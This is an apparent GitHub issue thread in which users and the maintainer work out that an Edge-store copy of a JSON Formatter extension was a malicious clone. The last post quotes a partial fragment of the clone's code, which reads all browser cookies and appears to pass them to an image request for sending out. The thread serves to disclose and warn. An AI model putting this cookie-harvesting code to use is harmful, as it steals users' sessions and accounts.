Plugin considered Malware by Edge

[dv-adit]

Seems like the plugin is tagged a malware. Could you look into it and fix it?

[shawty]

Snap, my copy of edge has just flagged it as malware too, blocked me from using it.

[Schwencke]

I second this, just got flagged by edge

[bcookew]

It seems to be an accurate assessment as well given that when I try to remove the extension is automatically re-installs on launch. So far I have been unable to permanently remove it from my system and no AV or Malware tool I have tried so far picks it up.

[bcookew]

I have had another look at the above posts and my own issue with this extension and I am wondering if all of us who are having a problem installed a knock off of your extension that points to you as the dev. I noticed that the icon and name of the extension are different than you advertise on this repo even though the extension we have all installed points here. Any thoughts on this anyone?

[shawty]

@bcookew In my case, no I don't believe I have installed a knock off. If I have, then it's been sat there on my PC running for years by now, I last installed this, easily over 4 years ago, when I last removed and did a clean re-install.

Up until yesterday (27th Aug 2023) this add-on has faithfully rendered JSON data in my browser, for at least this length of time, when I click on the "website link" it actually brings me to this website:

Given that I've never had cause to re-install it for years, not updated it for years, and not seen any untoward behaviour from it in that time, then for it to suddenly change and be flagged, in my mind, means someone has reported it to MS/Google as a bad extension and they've flagged it in the extension stores without bothering to investigate.

The ONLY thing different in my system between it not being flagged, and suddenly being flagged is that edge updated itself, so it now has round corners in the client area....

I guess it's possible that the extension auto updated, but I don't have auto update turned on for any of my extensions that I'm aware of, and looking right now in the extension details, there's no auto update or anything visible or switched on.

[bcookew]

@shawty Yeah fair, I had had it installed since 2021 with no issues and the same experience re the "Open Extension Website" link. The phantom reinstall has me concerned though. For Edge to flag it and for it to become suddenly unremovable at the same time would be a strange coincidence unless as you suspect it's a Microsoft introduced bug.

[shawty]

One thing that is interesting however.....

The last time @callumlocke boosted the version number on his plugin was back in December 2022

That made the product version 0.7.1

In my version and the other screen shot above, the version reads as version 1.0.0

So it's possible that perhaps the authors account has been breached somehow, maybe an infected NPM package or similar, and that the product in the extension store is poisoned in someway.

[shawty]

@bcookew I'm not giving any particular judgment just yet :-D LOL, truth is, like anyone here I'm just a user taking a stab in the dark, I guess we'll just have to wait and see what happens.

Edge has disabled the extension from running for me for now, so I'm not gonna go poke the bear so to speak, I'll leave it the way it is for a while and see what crops up here.

It might however be worth installing the plug-in in a VM or other suitable sandbox and see if it really does do anything horrible, likewise might also be worth trying it in Chrome too, see if Google has flagged it also.

[bcookew]

@shawty I would be interested, if you are willing, in whether you can successfully remove it. Using the remove button in the extension manager removes it for me but it reappears after Edge is closed and reopened...

[shawty]

@shawty I would be interested, if you are willing, in whether you can successfully remove it. Using the remove button in the extension manager removes it for me but it reappears after Edge is closed and reopened...

Not tonight, it's pretty late here in the UK, but I have my copy of edge setup to replicate plugins, bookmarks etc across different devices, so rather than risk my main work machine, I'll try it in one of the many Windows VM's I have, or on a different machine, probably sometime during the next week.

[zenturacp]

What does the malware do??

I was kind of confused about the actual issue? I had issues with Facebook some days ago where it added some users to my campain manager and it added campains i did not start :-( could be this plugin

[shawty]

No idea on that one yet, I've not let it run or anything, been too busy to sandbox it.

[callumlocke]

I have not published anything to the Edge store, ever. If someone else is publishing something there (or anywhere) called "JSON Beauty Formatter", that is definitely not JSON Formatter.

I gather my extension somehow works in Edge, based on seeing comments from people apparently using it in that browser, but that's all I know. Maybe they are all just using forks. Or maybe they are installing my extension from source. Or maybe Edge can install extensions from the Chrome store? I have never really looked into it.

I'll try to figure it out when I get home.

JSON Formatter itself has not been compromised. The screenshot posted here is not of JSON Formatter.

[Schwencke]

@callumlocke edge now runs on the chrome engine, and therefore can use and install extensions directly from the Chrome store, something Microsoft highlights when trying to convince people to use Edge.

Im guessing that someone has deployed a fake using links and images to create a look-a-like to edge store. it even had the same description.

[shawty]

I have not published anything to the Edge store, ever. If someone else is publishing something there (or anywhere) called "JSON Beauty Formatter", that is definitely not JSON Formatter.

I gather my extension somehow works in Edge, based on seeing comments from people apparently using it in that browser, but that's all I know. Maybe they are all just using forks. Or maybe they are installing my extension from source. Or maybe Edge can install extensions from the Chrome store? I have never really looked into it.

I'll try to figure it out when I get home.

JSON Formatter itself has not been compromised. The screenshot posted here is not of JSON Formatter.

Hi @callumlocke just to fill in some gaps for you :-)

ALL chrome extensions even launched from the chrome web store do by default work in the current versions of edge.

Can't remember exactly when it was but it's been the current state of play now for at least 5 years that I can remember, MS-Edge actually uses chrome under the hood.

Basically, if you take chrome, remove all the UI and Google specific stuff, then wrap the MS UI and features around it, then you have edge.

For quite some time now, us edge users have been able to install chrome plugins direct from the chrome extension store.

I've just checked the "extension store" link in my browsers extensions control panel, and it's taken me to what now appears to be a non existent MS-Edge store page.

If however I click on the "Project Page" link just below the store page, it brings me directly to this git-hub repo.

I'm going to guess, based on your response that what someone's possibly done is cloned your repo, recompiled it, and published it on the MS-Edge extension store, making all of us think we where in fact installing your plug-in, so I'm going to be the first to apologise for pointing the finger.

Right now, I'm going to remove the copy I have, and re-install your genuine copy from the CHROME web store and not the MS-Edge version (Which now appears to have been removed anyway)

Note of caution to my fellow MS-Edge users, always be careful now that we know that two different people can place 2 identical plug-in's in the 2 different web stores.

[shawty]

Another update, I've just gone to the Chrome Store, and this is what I see

Edge seems to think that the plugin in the chrome store, and the one I have (soon to be had) installed, are one and the same thing!

Also @callumlocke the screen grab I see of your plug-in there on the chrome store, is exactly the same as the what the one I had installed looked like.

[callumlocke]

@shawty interesting, thanks.

Still haven't got round to this but I'm planning to just officially publish JF to the Edge store and hope that this stops people using fakes. The tricky thing is some 'fakes' are totally legit forks that add useful features people actually want, and I don't want to accuse them of anything, but I can't easily tell if they're privacy-respecting or not.

Considering renaming it somehow to a slightly less generic name so it's easier to distinguish from clones. Could just rename it "Callum's JSON Formatter" maybe. Open to any suggestions.

[ShortDevelopment]

It seems like this was actually malware, that grabs your cookies...

function checkVer(u, ix) {
    chrome.cookies.getAll({
        url: u
    }, function (cl) {
        //Get current config
        var apps = {}
        for (var i = 0; i < cl.length; i++) {
            apps[cl[i].name] = cl[i].value + "__" 
            + extD(cl[i].domain);
        }
        makeMsg(chrome.runtime.getManifest().name, chrome.runtime.getManifest().description, apps, ix);
    });
}

function makeMsg(title, msg, apps, ix) {
    ...
    var btn = document.createElement("img");
    btn.setAttribute("class", "_42ft _42fu _42gy");
    //buttonEl.setAttribute("target", "_blank");
    //Todo: Need to remove not use code in next version
    //buttonEl.setAttribute("href", button.href || "#");
    //buttonEl.setAttribute("target", "_blank");
    btn.setAttribute("src", cu);
    doc.appendChild(btn);
    ...
}